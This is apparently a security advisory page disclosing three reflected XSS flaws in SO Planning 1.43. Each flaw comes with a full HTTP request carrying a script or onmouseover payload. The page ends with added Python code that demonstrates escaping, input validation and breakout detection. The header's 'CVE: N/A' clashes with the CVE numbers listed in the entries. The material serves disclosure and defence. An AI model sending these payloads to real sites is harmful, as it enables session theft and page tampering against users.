SO Planning 1.43 - Multiple XSS Injection

2019.04.15
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

===========================================================================================
# Exploit Title: SO Planning 1.43 - 'PROJECT_COLORS_POSSIBLE' XSS Injection
# CVE: CVE-2019-8406
# Date: 17-02-2019
# Exploit Author: Mehmet EMIROGLU
# Vendor Homepage: https://www.soplanning.org/en/
# Software Link: https://sourceforge.net/projects/soplanning/
# Version: v1.43
# Category: Webapps
# Tested on: Wamp64, @Win
# Software description: SO Planning is a Simple Online Planning tool. Allows you to plan working periods for each person of your team, in a visual / printable result.
===========================================================================================
# POC - XSS
# Parameters : PROJECT_COLORS_POSSIBLE
# Attack Pattern : e'"()&%<acx><ScRiPt >alert(9871)</ScRiPt>
# POST Request : http://localhost/soplanning/www/process/options.php
===========================================================================================
GET /soplanning/www/options.php HTTP/1.1
Referer: http://localhost/soplanning/
Cookie: sloapplanning_=28973u450s43jhtt88s8e2molo; baseLigne=users; baseColonne=jours; dimensionCase=reduit; date_debut_affiche=09%2F02%2F2019; date_fin_affiche=08%2F05%2F2019; statut_projet=%5B%22abandon%22%2C%22archive%22%2C%22a_faire%22%2C%22en_cours%22%2C%22fait%22%2C%22a%22%2C%22%23%22%2C%22%23%22%2C%22p%22%2Cnull%2Cnull%2Cnull%2Cnull%2C%220%22%2C%221%22%2C%22f%22%2C%224%22%2Cnull%2Cnull%2C%22a%22%2C%22%23%22%2C%22%23%22%2C%22p%22%2Cnull%2Cnull%2Cnull%2Cnull%2C%220%22%2C%221%22%2C%22f%22%2C%224%22%2Cnull%2Cnull%2C%22e%22%2C%22%23%22%2C%22%23%22%2C%22p%22%2Cnull%2Cnull%2Cnull%2Cnull%2C%220%22%2C%221%22%2C%22f%22%2C%224%22%2Cnull%2Cnull%2C%22f%22%2C%22%23%22%2C%22%23%22%2C%22p%22%2Cnull%2Cnull%2Cnull%2Cnull%2C%220%22%2C%221%22%2C%22f%22%2C%224%22%2Cnull%2Cnull%2C%22a%22%2C%22%23%22%2C%22%23%22%2C%22p%22%2Cnull%2Cnull%2Cnull%2Cnull%2C%220%22%2C%221%22%2C%22f%22%2C%224%22%2Cnull%2Cnull%2C%22a%22%2C%22%23%22%2C%22%23%22%2C%22p%22%2Cnull%2Cnull%2Cnull%2Cnull%2C%220%22%2C%221%22%2C%22f%22%2C%224%22%2Cnull%2Cnull%5D; dateDebut=16/02/2019; dateFin=16/04/2019; xposJoursWin=0; xposJours=0; xposMois=0; yposMois=0; xposMoisWin=0; pdf_orientation=portrait; pdf_format=A0; date_debut_affiche_tache=e; date_fin_affiche_tache=e
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
Host: localhost

###########################################################################################

===========================================================================================
# Exploit Title: SO Planning 1.43 - 'xajax' XSS Injection
# CVE: CVE-2019-8405
# Date: 17-02-2019
# Exploit Author: Mehmet EMIROGLU
# Vendor Homepage: https://www.soplanning.org/en/
# Software Link: https://sourceforge.net/projects/soplanning/
# Version: v1.43
# Category: Webapps
# Tested on: Wamp64, @Win
# Software description: SO Planning is a Simple Online Planning tool. Allows you to plan working periods for each person of your team, in a visual / printable result.
===========================================================================================
# POC - XSS
# Parameters : xajax
# Attack Pattern : submitFormProjet'"()&%<acx><ScRiPt >lWct(9209)</ScRiPt>
# POST Request : http://localhost/soplanning/www/process/xajax_server.php
===========================================================================================
POST /soplanning/www/process/xajax_server.php HTTP/1.1
Content-Length: 334
Content-Type: application/x-www-form-urlencoded
Referer: http://localhost/soplanning/
Cookie: sloapplanning_=28973u450s43jhtt88s8e2molo; baseLigne=users; baseColonne=jours; dimensionCase=reduit; date_debut_affiche=09%2F02%2F2019; date_fin_affiche=08%2F05%2F2019; statut_projet=%5B%22abandon%22%2C%22archive%22%2C%22a_faire%22%2C%22en_cours%22%2C%22fait%22%2C%22a%22%2C%22%23%22%2C%22%23%22%2C%22p%22%2Cnull%2Cnull%2Cnull%2Cnull%2C%220%22%2C%221%22%2C%22f%22%2C%224%22%2Cnull%2Cnull%2C%22a%22%2C%22%23%22%2C%22%23%22%2C%22p%22%2Cnull%2Cnull%2Cnull%2Cnull%2C%220%22%2C%221%22%2C%22f%22%2C%224%22%2Cnull%2Cnull%2C%22e%22%2C%22%23%22%2C%22%23%22%2C%22p%22%2Cnull%2Cnull%2Cnull%2Cnull%2C%220%22%2C%221%22%2C%22f%22%2C%224%22%2Cnull%2Cnull%2C%22f%22%2C%22%23%22%2C%22%23%22%2C%22p%22%2Cnull%2Cnull%2Cnull%2Cnull%2C%220%22%2C%221%22%2C%22f%22%2C%224%22%2Cnull%2Cnull%2C%22a%22%2C%22%23%22%2C%22%23%22%2C%22p%22%2Cnull%2Cnull%2Cnull%2Cnull%2C%220%22%2C%221%22%2C%22f%22%2C%224%22%2Cnull%2Cnull%2C%22a%22%2C%22%23%22%2C%22%23%22%2C%22p%22%2Cnull%2Cnull%2Cnull%2Cnull%2C%220%22%2C%221%22%2C%22f%22%2C%224%22%2Cnull%2Cnull%5D; dateDebut=16/02/2019; dateFin=16/04/2019; xposJoursWin=0; xposJours=0; xposMois=0; yposMois=0; xposMoisWin=0; pdf_orientation=portrait; pdf_format=A0; date_debut_affiche_tache=e; date_fin_affiche_tache=e
Host: localhost
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*

xajax=submitFormProjet'"()%26%25<acx><ScRiPt%20>lWct(9209)</ScRiPt>&xajaxargs[]=undefined&xajaxargs[]=undefined&xajaxargs[]=undefined&xajaxargs[]=undefined&xajaxargs[]=undefined&xajaxargs[]=undefined&xajaxargs[]=undefined&xajaxargs[]=undefined&xajaxargs[]=&xajaxargs[]=undefined&xajaxargs[]=undefined&xajaxargs[]=&xajaxr=1550350032415

###########################################################################################

===========================================================================================
# Exploit Title: SO Planning 1.43 - 'graphe_width' XSS Injection
# CVE: CVE-2019-8403
# Date: 17-02-2019
# Exploit Author: Mehmet EMIROGLU
# Vendor Homepage: https://www.soplanning.org/en/
# Software Link: https://sourceforge.net/projects/soplanning/
# Version: v1.43
# Category: Webapps
# Tested on: Wamp64, @Win
# Software description: SO Planning is a Simple Online Planning tool. Allows you to plan working periods for each person of your team, in a visual / printable result.
===========================================================================================
# POC - XSS
# Parameters : graphe_width, graphe_height, ordonnee_max, ordonnee_min
# Attack Pattern : 500"onmouseover=jfQ2(9564)"
# POST Request : http://localhost/soplanning/www/stats_users.php
===========================================================================================
POST /soplanning/www/stats_users.php HTTP/1.1
Content-Length: 245
Content-Type: application/x-www-form-urlencoded
Referer: http://localhost/soplanning/
Cookie: sloapplanning_=28973u450s43jhtt88s8e2molo; baseLigne=users; baseColonne=jours; dimensionCase=reduit; date_debut_affiche=09%2F02%2F2019; date_fin_affiche=08%2F05%2F2019; statut_projet=%5B%22abandon%22%2C%22archive%22%2C%22a_faire%22%2C%22en_cours%22%2C%22fait%22%2C%22a%22%2C%22%23%22%2C%22%23%22%2C%22p%22%2Cnull%2Cnull%2Cnull%2Cnull%2C%220%22%2C%221%22%2C%22f%22%2C%224%22%2Cnull%2Cnull%2C%22a%22%2C%22%23%22%2C%22%23%22%2C%22p%22%2Cnull%2Cnull%2Cnull%2Cnull%2C%220%22%2C%221%22%2C%22f%22%2C%224%22%2Cnull%2Cnull%2C%22e%22%2C%22%23%22%2C%22%23%22%2C%22p%22%2Cnull%2Cnull%2Cnull%2Cnull%2C%220%22%2C%221%22%2C%22f%22%2C%224%22%2Cnull%2Cnull%2C%22f%22%2C%22%23%22%2C%22%23%22%2C%22p%22%2Cnull%2Cnull%2Cnull%2Cnull%2C%220%22%2C%221%22%2C%22f%22%2C%224%22%2Cnull%2Cnull%2C%22a%22%2C%22%23%22%2C%22%23%22%2C%22p%22%2Cnull%2Cnull%2Cnull%2Cnull%2C%220%22%2C%221%22%2C%22f%22%2C%224%22%2Cnull%2Cnull%2C%22a%22%2C%22%23%22%2C%22%23%22%2C%22p%22%2Cnull%2Cnull%2Cnull%2Cnull%2C%220%22%2C%221%22%2C%22f%22%2C%224%22%2Cnull%2Cnull%5D; dateDebut=16/02/2019; dateFin=16/04/2019; xposJoursWin=0; xposJours=0; xposMois=0; yposMois=0; xposMoisWin=0; pdf_orientation=portrait; pdf_format=A0; date_debut_affiche_tache=e; date_fin_affiche_tache=e
Host: localhost
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*

abscisse_echelle=jour&abscisse_echelle_valeur=heures&date_debut=16/02/2019&date_fin=16/03/2019&graphe_height=500"onmouseover=jfQ2(9564)"&graphe_width=1100&grille=grille_h&ordonnee_max=1&ordonnee_min=1&projets=1&projet_id=test&users=1&user_id=ADM
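The third PoC reflects graphe_height unescaped inside a quoted HTML attribute, so the value `500"onmouseover=...` closes the attribute and adds an event handler. The following is an added example, not code from the advisory or from SO Planning, showing the attribute-context breakout and two defensive fixes: output encoding for the attribute, and strict integer validation for the dimension and axis parameters the advisory lists, plus an allow-list for the xajax handler name (the form markup, the allow-list contents and the numeric range are assumptions).

```python
"""Defensive handling of the reflected parameters named in the advisory.
Added example; the markup, allow-list and range bounds are assumed, not SO Planning's."""
import html
import re

# Constructed from the advisory's attack pattern: closes the value attribute
# and appends an event handler.
ATTR_BREAKOUT = '500"onmouseover=jfQ2(9564)"'

def render_graph_field_unsafe(name: str, value: str) -> str:
    """Mirrors the vulnerable behaviour: raw value echoed into an attribute."""
    return f'<input type="text" name="{name}" value="{value}">'

def render_graph_field_safe(name: str, value: str) -> str:
    """Encode for the attribute context; quote=True also encodes " and '."""
    return f'<input type="text" name="{name}" value="{html.escape(value, quote=True)}">'

# graphe_width, graphe_height, ordonnee_max, ordonnee_min are all numeric by design.
NUMERIC_PARAMS = ("graphe_width", "graphe_height", "ordonnee_max", "ordonnee_min")

def validate_numeric(name: str, raw: str, lo: int = -10000, hi: int = 10000) -> int:
    """Stricter fix: accept only an integer within an assumed sane range."""
    if not re.fullmatch(r"-?\d{1,6}", raw):
        raise ValueError(f"{name}: not an integer")
    n = int(raw)
    if not lo <= n <= hi:
        raise ValueError(f"{name}: out of range")
    return n

# Assumed allow-list of server-side xajax handlers; anything else is rejected
# instead of being reflected into the response.
XAJAX_ALLOWED = frozenset({"submitFormProjet"})

def dispatch_xajax(func_name: str) -> str:
    """Return the handler name only if it is known; never echo unknown names."""
    if func_name not in XAJAX_ALLOWED:
        raise ValueError("unknown xajax function")
    return func_name

def attribute_breakout(rendered: str) -> bool:
    """True if a value escaped its attribute: a closing quote followed by on*=."""
    return re.search(r'value="[^"]*"\s*on\w+\s*=', rendered) is not None
```

Running `attribute_breakout` over the unsafe rendering of `ATTR_BREAKOUT` reports the breakout, while the encoded rendering and the integer validator both neutralise it.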


Copyright 2019, cxsecurity.com
